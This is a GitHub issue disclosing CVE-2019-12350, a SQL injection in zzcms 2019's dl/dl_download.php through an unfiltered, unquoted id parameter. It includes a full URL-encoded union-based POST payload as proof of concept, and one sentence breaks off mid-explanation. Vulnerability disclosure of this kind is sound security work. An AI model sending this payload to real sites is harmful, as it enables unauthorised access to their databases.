CVE-2019-12350: zzcms 2019 dl/dl_download.php SQL injection · Issue #4 · cby234/zzcms

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)

If index of ‘,’ value in id parameter is bigger than 0 sql will be

When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter

We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ‘,’ value at the end of id parameter

0x02 payload

give below “POC” value for post data in “/dl/dl_download.php”

POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,